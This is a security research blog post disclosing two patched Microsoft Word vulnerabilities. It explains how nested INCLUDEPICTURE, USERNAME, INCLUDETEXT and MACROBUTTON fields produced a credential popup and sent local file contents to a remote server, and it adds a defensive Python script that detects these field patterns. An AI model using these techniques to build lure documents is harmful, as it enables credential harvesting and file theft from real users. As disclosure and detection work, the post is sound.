In January and February 2019 Microsoft provided patches for CVE-2019-0540 and CVE-2019-0561, which were reported by Stan and me. We disclosed the details in our Black Hat Asia talk “Office in Wonderland”. Both vulnerabilities abuse a feature in Word called “fields”. In this blog post we will dive into this.
Fields are a powerful feature in Microsoft Word to handle all kinds of dynamic text in a document (such as inserting a table of contents or the author’s name). This functionality stems from the early days of MS Word. In Word you can go to Insert > Quick Parts > Field and you will be greeted with a large variety of fields and options.
One of the most commonly abused fields by attackers and red teamers is INCLUDEPICTURE. This field allows you to insert a picture into the document and mark it as dynamic (Data not stored with document). Once a victim opens a document outside protected mode, Word will retrieve the picture. This request can be used to track whether users open a specific malicious document.
Another common abuse of the INCLUDEPICTURE field is to have it load a picture from the intranet, which can be abused using relay attacks with tools such as Responder. More information about this technique can be found here.
Pro-tip: when working with fields, use Alt+F9 to switch between the ‘field code’ and the regular display of the field.
CVE-2019-0540 – Word credential popup
Instead of using fields for tracking victims and relay attacks, we set out on a quest to create a credential popup in Word. This is a technique commonly applied by attackers for credential harvesting. For example, the cyber criminal group FIN4 was known to achieve this via VBA macros in order to steal credentials that would give access to insider trading information. We wanted to achieve the same thing (a credential harvesting document) without VBA and without triggering any security warnings.
Our first attempt was an INCLUDEPICTURE field that pointed to a web server that always replied with an HTTP basic authentication request. It failed: Word did not show a credential popup after the document was saved and reopened.
We continued the research and took the approach of combining fields with various edge cases. We made the URL of the INCLUDEPICTURE dynamic by adding a USERNAME field within the URL, saved the field in the header of a Word template (dot) and suddenly we managed to get a working sample.
CVE-2019-0561 – Arbitrary file read
Another field of interest is INCLUDETEXT. This field reads a file and includes its contents in the Word document, which makes it an ideal building block for arbitrary file read attacks.
An old vulnerability (CVE-2002-1143) showed that the combination of INCLUDETEXT and INCLUDEPICTURE fields could be abused back in the day to read an arbitrary file without displaying security warnings to the user. As far as we understood, Microsoft fixed this by no longer automatically updating the INCLUDETEXT fields on various events.
We wanted to see how robust the mitigation against file-reading attacks with INCLUDETEXT was, so we began combining fields in various ways. In that process we discovered that there was a MACROBUTTON field with the option ‘UpdateFields’. When a user double-clicks this button, a field is updated. Note that the MACROBUTTON name can be a bit misleading: it is not VBA and does not trigger macro warnings.
We combined the INCLUDETEXT field with an INCLUDEPICTURE field to send the file contents to a web server. To lure a user into double-clicking the MACROBUTTON, we added a second INCLUDEPICTURE of a monkey and asked the user to ‘double click the monkey to see him dance’. Upon double-clicking, the MACROBUTTON would kick off the chain of events and eventually the contents of the file specified in INCLUDETEXT get pushed to our web server.
Microsoft’s mitigation was to include a new security warning in Word. This warning will likely alert on various similar field abuses as well.
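For defenders who want to triage documents for the field patterns described above, here is an added example (not code from the original post or from Microsoft). It assumes the input is the XML of a single part extracted from an OOXML package (for example word/document.xml or word/header1.xml); the function names and the sample header are constructed for illustration, and legacy binary .doc/.dot files are out of scope.

```python
import re
import xml.etree.ElementTree as ET

W = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"
REMOTE = re.compile(r"https?://|\\{4}", re.I)  # URL, or UNC path with doubled backslashes

def fields(xml_text):
    """Rebuild the fields of one part as (name, instruction, nested field names)."""
    stack, done = [], []
    for el in ET.fromstring(xml_text).iter():  # document order
        if el.tag == W + "fldSimple":
            instr = el.get(W + "instr", "")
            done.append(((instr.split() or ["?"])[0].upper(), " ".join(instr.split()), []))
        elif el.tag == W + "instrText" and stack and stack[-1]["code"]:
            stack[-1]["instr"] += el.text or ""
        elif el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                stack.append({"instr": "", "kids": [], "code": True})
            elif kind == "separate" and stack:
                stack[-1]["code"] = False  # cached result follows, not field code
            elif kind == "end" and stack:
                f = stack.pop()
                name = (f["instr"].split() or ["?"])[0].upper()
                if stack and stack[-1]["code"]:
                    stack[-1]["kids"].append(name)  # nested inside the parent's field code
                done.append((name, " ".join(f["instr"].split()), f["kids"]))
    return done

def findings(xml_text):
    """Flag the field patterns this post describes."""
    out = []
    for name, instr, kids in fields(xml_text):
        if name in ("INCLUDEPICTURE", "INCLUDETEXT") and kids:
            out.append(f"{name} target built from nested {'+'.join(kids)}")
        elif name in ("INCLUDEPICTURE", "INCLUDETEXT") and REMOTE.search(instr):
            out.append(f"{name} loads remote content")
        elif name == "MACROBUTTON" and instr.upper().split()[1:2] == ["UPDATEFIELDS"]:
            out.append("MACROBUTTON UpdateFields trigger")
    return out

# Constructed sample header part (not taken from a real document).
NS = 'xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"'
FC = '<w:r><w:fldChar w:fldCharType="%s"/></w:r>'
IT = "<w:r><w:instrText>%s</w:instrText></w:r>"
HEADER = (f"<w:hdr {NS}><w:p>" + FC % "begin" + IT % ' INCLUDEPICTURE "http://example.invalid/'
          + FC % "begin" + IT % " USERNAME " + FC % "separate" + FC % "end" + IT % '.png" \\d '
          + FC % "separate" + FC % "end" + "</w:p></w:hdr>")
print(findings(HEADER))  # ['INCLUDEPICTURE target built from nested USERNAME']
```

Run it over every XML part under word/ in the package, headers and footers included, since the credential popup sample kept its field in a template header.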
Submitted to MSRC: September 2018
Patch release: January and February 2019
Public disclosure: March 2019